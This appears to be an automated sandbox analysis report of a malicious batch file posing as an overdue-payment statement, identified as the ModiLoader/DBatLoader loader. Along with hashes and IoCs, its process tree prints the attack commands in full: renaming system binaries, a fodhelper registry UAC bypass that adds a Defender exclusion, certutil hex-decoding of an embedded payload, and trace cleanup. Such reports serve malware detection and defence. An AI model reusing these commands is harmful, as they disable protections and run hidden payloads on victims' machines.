Analysis

  • max time kernel
    141s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    26-03-2024 02:42

General

  • Target

    Statement Of Account - Overdue Payments #94839540823489.bat

  • Size

    2.9MB

  • MD5

    0acc894a421b72f77d8f825865710ec4

  • SHA1

    e51bfe768ece4a254a5f85c977fa65dfa963c3b8

  • SHA256

    e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e

  • SHA512

    4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02

  • SSDEEP

    24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\system32\cmd.exe
      cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\system32\extrac32.exe
        extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
        3⤵
          PID:2460
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1844
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
          3⤵
            PID:1836
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1152
          • C:\Windows\system32\extrac32.exe
            extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
            3⤵
              PID:2068
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1928
            • C:\Users\Public\xkn.exe
              C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2620
              • C:\Users\Public\alpha.exe
                "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2816
                • C:\Windows\system32\reg.exe
                  reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  5⤵
                  • Modifies registry class
                  • Modifies registry key
                  PID:1792
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 9
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2604
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 9
              3⤵
              • Executes dropped EXE
              PID:2496
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2524
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
              3⤵
              • Executes dropped EXE
              PID:2568
          • C:\Users\Public\Libraries\Lewxa.com
            C:\\Users\\Public\\Libraries\\Lewxa.com
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2928
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 836
              3⤵
              • Loads dropped DLL
              • Program crash
              PID:1560
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:3056
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:1704
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:2160
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:1632
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2720
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettings.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2564
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
            2⤵
            • Executes dropped EXE
            PID:2792
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettingsAdminFlows.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2788

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Public\Lewxa.txt

          Filesize

          2.0MB

          MD5

          cde0e4350f0886229b0a605810fbe397

          SHA1

          2ebdce74856c9e858064bbf53b2c8c46c20a58da

          SHA256

          f577452dfa0c5aab1f574fd66e8c4430687731ad062916f0b7db09189dede263

          SHA512

          c9f15d848b499325e6a4185416af67a41cbec16884d726244bc638e52928744dc91092eaab91e224ecbf4895342c95c6ca97c8002eecc298c2ee75e0bf5c000c

        • C:\Users\Public\Libraries\Lewxa.com

          Filesize

          1.0MB

          MD5

          701a1b8de275a64ad562d862d7e117d4

          SHA1

          a6dcd9f802a20fa07bd2f569b0761244ab5803a7

          SHA256

          f5ad3a45f4bea88e28aa2c541ee13ab28fa68a29af572ce2ca02960464d601ad

          SHA512

          085a5becd2c1ceac9a0dfefdc0dc663d598062b2bfef24e3709b0998924f98836eaa0d66bc21dbda9842fead17443fbd3b69febd620639b8e1921d3b0e797a32

        • \Users\Public\alpha.exe

          Filesize

          337KB

          MD5

          5746bd7e255dd6a8afa06f7c42c1ba41

          SHA1

          0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

          SHA256

          db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

          SHA512

          3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

        • \Users\Public\kn.exe

          Filesize

          1.1MB

          MD5

          ec1fd3050dbc40ec7e87ab99c7ca0b03

          SHA1

          ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

          SHA256

          1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

          SHA512

          4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

        • \Users\Public\xkn.exe

          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

        • memory/2620-23-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

          Filesize

          9.6MB

        • memory/2620-22-0x0000000000480000-0x0000000000488000-memory.dmp

          Filesize

          32KB

        • memory/2620-25-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2620-30-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2620-33-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

          Filesize

          9.6MB

        • memory/2620-34-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

          Filesize

          9.6MB

        • memory/2620-24-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2620-32-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2620-21-0x000000001B460000-0x000000001B742000-memory.dmp

          Filesize

          2.9MB

        • memory/2928-48-0x0000000000220000-0x0000000000221000-memory.dmp

          Filesize

          4KB

        • memory/2928-55-0x00000000030E0000-0x00000000040E0000-memory.dmp

          Filesize

          16.0MB

        • memory/2928-57-0x00000000030E0000-0x00000000040E0000-memory.dmp

          Filesize

          16.0MB

        • memory/2928-59-0x0000000000220000-0x0000000000221000-memory.dmp

          Filesize

          4KB

        • memory/2928-60-0x0000000000400000-0x000000000050F000-memory.dmp

          Filesize

          1.1MB